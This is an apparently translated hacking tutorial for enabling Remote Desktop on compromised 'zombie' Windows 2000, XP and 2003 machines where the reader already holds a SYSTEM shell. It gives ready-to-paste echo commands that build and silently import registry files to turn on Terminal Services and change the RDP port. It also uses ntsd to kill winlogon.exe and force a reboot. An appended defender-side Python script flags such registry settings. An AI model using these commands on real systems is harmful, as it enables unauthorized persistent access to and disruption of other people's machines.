Last article before the 11th (National Day) holiday: a complete guide to enabling the 3389 terminal on zombies

Source: Internet
Author: User

The terminal-enabling method introduced today is green, environmentally friendly and pollution-free ~~
You do not need to upload any files to enable the terminal. The method applies to Win2K, XP and 2003.

The premise of this article is that you have already obtained, by some means, a remote shell on the target with SYSTEM privileges ~~

Enabling the terminal service without uploading any files

I. Enabling the terminal on Win2K

First, use echo to write a 3389.reg file and then import it into the registry. The echo lines are as follows:

echo Windows Registry Editor Version 5.00>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]>>3389.reg
echo "Enabled"="0">>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]>>3389.reg
echo "ShutdownWithoutLogon"="0">>3389.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]>>3389.reg
echo "EnableAdminTSRemote"=dword:00000001>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "TSEnabled"=dword:00000001>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>3389.reg
echo "Start"=dword:00000002>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]>>3389.reg
echo "Start"=dword:00000002>>3389.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]>>3389.reg
echo "Hotkey"="1">>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg

Paste the echo lines into the cmd shell to generate 3389.reg, then run regedit /s 3389.reg to import it into the registry.

(To change the terminal port, you only need to change the two d3d values above.)

Because the Win2K terminal does not take effect immediately the way XP does, it only takes effect after the machine is restarted.

Simply use ntsd.exe (a command built into Win2K) to end a critical process and the machine restarts!!

For example, end winlogon.exe. lsass.exe works too, but after it is ended a restart countdown pops up (not good ~).

Once winlogon.exe is ended, the machine is forced to restart immediately.

The command format is ntsd -c q -p pid

where pid is the process ID of winlogon.exe ~

The following script lists the PIDs of all processes:

Wscript.Echo "PID processname"
For Each ps In GetObject("winmgmts:\\.\root\cimv2:win32_process").Instances_
    Wscript.Echo ps.Handle & vbTab & ps.Name
Next

Paste the following echo lines into the cmd shell to produce the script 1.vbe for viewing process PIDs:

echo Wscript.Echo "PID processname">1.vbe
echo For Each ps In GetObject("winmgmts:\\.\root\cimv2:win32_process").Instances_>>1.vbe
echo Wscript.Echo ps.Handle ^& vbTab ^& ps.Name>>1.vbe
echo Next>>1.vbe

After 1.vbe is generated, check that the script produced by the echo lines is correct (it should be only four lines; compare with the listing above).

Run 1.vbe and you get a result like the following:

C:\winnt\system32>cscript 1.vbe
cscript 1.vbe
Microsoft (R) Windows Script Host Version 5.1 for Windows
Copyright (C) Microsoft Corporation 1996-1999. All rights reserved.

PID processname
0 System Idle Process
8 System
152 smss.exe
180 csrss.exe
200 winlogon.exe
228 services.exe
240 lsass.exe
424 svchost.exe
472 spoolsv.exe
512 msdtc.exe
616 svchost.exe
628 kavsvc.exe
660 llssrv.exe
692 nvsvc32.exe
728 regsvc.exe
748 mstask.exe
776 alter.exe
900 svchost.exe
916 winmgmt.exe
1088 dfssvc.exe
484 EXPLORER.EXE
1444 mdm.exe
1340 server.exe
1224 ibguard.exe
1252 kavsvcui.exe
1256 ibserver.exe
1336 internat.exe
1204 uspds.exe
720 bar.exe
1288 dllhost.exe
1580 inetinfo.exe
1672 cmd.exe
1464 pppoe.exe
1704 regedit.exe
316 cscript.exe

From the listing we can see that the PID of winlogon.exe is 200. Run ntsd -c q -p 200 (replace 200 with the actual pid of the winlogon.exe process).

The machine restarts (ntsd.exe is a built-in Windows tool that can end any process ~~).

II. Enabling the terminal on WinXP and Win2003

The contents of the reg file that enables the terminal are as follows:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
"PortNumber"=dword:00000d3d

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d

Use the following echo lines to write the reg file, import it and delete it:

echo Windows Registry Editor Version 5.00>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg

In this way, XP and 2003 do not need a restart. To change the port, change the d3d in the two PortNumber values above to the hexadecimal form of the desired decimal port number (use the calculator to convert). On XP, neither enabling the terminal nor changing its port requires a restart. This is really amazing ~~ haha. To disable the terminal again, change "fDenyTSConnections"=dword:00000000

to "fDenyTSConnections"=dword:00000001.
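As an added defender-side example (not part of the original article), the following Python parses a .reg file in the form built by the echo lines in both sections and reports the settings an incident responder should notice: fDenyTSConnections and TSEnabled, the PortNumber values (decoding the hex dword, so 00000d3d reads as 3389), and the Start values of the TermService and TermDD services. The sample .reg content is constructed here.

```python
import re
# Constructed sample in the .reg shape the article builds with echo (not a captured artifact).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00000d3d
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
"Start"=dword:00000002
'''

KEY_RE = re.compile(r"^\[(.+)\]$")                                  # [key path]
VAL_RE = re.compile(r'^"([^"]+)"=(?:dword:([0-9a-fA-F]{8})|"(.*)")$')  # "name"=dword:... or "name"="..."
TS_KEY = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
SVC_KEY = r"hkey_local_machine\system\currentcontrolset\services"

def parse_reg(text):
    """Parse a minimal .reg file into {key path: {value name: value}}; keys and names lowercased, dwords as int."""
    reg, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        key = KEY_RE.match(line)
        if key:
            current = key.group(1).lower()
            reg.setdefault(current, {})
            continue
        val = VAL_RE.match(line)
        if val and current is not None:
            name, dword, string = val.groups()
            reg[current][name.lower()] = int(dword, 16) if dword is not None else string
    return reg

def rdp_findings(text):
    """Return findings a reviewer would flag: RDP enabled, listener port set, terminal services set to auto-start."""
    reg = parse_reg(text)
    findings = []
    ts = reg.get(TS_KEY, {})
    if ts.get("fdenytsconnections") == 0:
        findings.append("enables Remote Desktop (fDenyTSConnections=0)")
    if ts.get("tsenabled") == 1:
        findings.append("enables Terminal Services (TSEnabled=1)")
    for key, values in reg.items():
        if key.startswith(TS_KEY + "\\") and "portnumber" in values:
            port, leaf = values["portnumber"], key.rsplit("\\", 1)[-1]
            tag = "default" if port == 3389 else "NON-DEFAULT"
            findings.append(f"sets RDP listener port to {port} ({tag}) under {leaf}")
    for svc in ("termservice", "termdd"):
        if reg.get(SVC_KEY + "\\" + svc, {}).get("start") == 2:
            findings.append(f"sets service {svc} to auto-start (Start=2)")
    return findings
```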
